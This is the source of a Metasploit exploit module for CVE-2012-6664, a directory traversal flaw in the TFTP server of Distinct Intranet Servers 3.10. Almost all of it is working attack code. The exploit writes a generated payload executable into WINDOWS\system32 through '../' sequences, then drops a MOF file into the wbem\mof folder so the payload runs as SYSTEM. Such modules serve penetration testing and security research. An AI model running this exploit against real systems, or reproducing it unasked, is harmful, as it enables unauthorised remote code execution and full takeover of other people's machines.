Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
class MetasploitModule < Msf::Exploit::Remote
6
  Rank = ExcellentRanking
7

8
  include Rex::Proto::TFTP
9
  include Msf::Exploit::EXE
10
  include Msf::Exploit::WbemExec
11
  include Msf::Exploit::FileDropper
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Distinct TFTP 3.10 Writable Directory Traversal Execution',
18
        'Description' => %q{
19
          This module exploits a directory traversal vulnerability in the TFTP
20
          Server component of Distinct Intranet Servers version 3.10 which
21
          allows a remote attacker to write arbitrary files to the server file
22
          system, resulting in code execution under the context of 'SYSTEM'.
23
          This module has been tested successfully on TFTP Server version 3.10
24
          on Windows XP SP3 (EN).
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' =>
28
          [
29
            'modpr0be', # Initial discovery, PoC (Tom Gregory)
30
            'sinn3r' # Metasploit
31
          ],
32
        'References' =>
33
          [
34
            ['OSVDB', '80984'],
35
            ['EDB', '18718'],
36
            ['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
37
            ['CVE', '2012-6664']
38
          ],
39
        'Payload' =>
40
          {
41
            'BadChars' => "\x00"
42
          },
43
        'DefaultOptions' =>
44
          {
45
            'EXITFUNC' => 'thread'
46
          },
47
        'Platform' => 'win',
48
        'Targets' =>
49
          [
50
            ['Automatic', { 'auto' => true }],
51
          ],
52
        'Privileged' => true,
53
        'DisclosureDate' => '2012-04-08',
54
        'DefaultTarget' => 0
55
      )
56
    )
57

58
    register_options([
59
      OptInt.new('DEPTH', [false, 'Levels to reach base directory', 10]),
60
      OptAddress.new('RHOST', [true, 'The remote TFTP server address']),
61
      OptPort.new('RPORT', [true, 'The remote TFTP server port', 69])
62
    ])
63
  end
64

65
  def upload(filename, data)
66
    tftp_client = Rex::Proto::TFTP::Client.new(
67
      'LocalHost' => '0.0.0.0',
68
      'LocalPort' => 1025 + rand(0xffff - 1025),
69
      'PeerHost' => datastore['RHOST'],
70
      'PeerPort' => datastore['RPORT'],
71
      'LocalFile' => "DATA:#{data}",
72
      'RemoteFile' => filename,
73
      'Mode' => 'octet',
74
      'Context' => { 'Msf' => framework, 'MsfExploit' => self },
75
      'Action' => :upload
76
    )
77

78
    tftp_client.send_write_request { |msg| print_status(msg) }
79
    until tftp_client.complete
80
      select(nil, nil, nil, 1)
81
      tftp_client.stop
82
    end
83
  end
84

85
  def exploit
86
    exe_name = "#{rand_text_alpha(8..15)}.exe"
87
    exe = generate_payload_exe
88
    mof_name = "#{rand_text_alpha(8..15)}.mof"
89
    mof = generate_mof(mof_name, exe_name)
90
    traversal = '../' * datastore['DEPTH'].to_i
91

92
    print_status("Sending EXE (#{exe.length} bytes)")
93
    upload("#{traversal}\\WINDOWS\\system32\\#{exe_name}", exe)
94
    register_file_for_cleanup(exe_name)
95

96
    # Let the TFTP server idle a bit before sending another file
97
    select(nil, nil, nil, 3)
98

99
    print_status("Sending MOF (#{mof.length} bytes)")
100
    upload("#{traversal}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
101
    register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
102
  end
103
end
104

105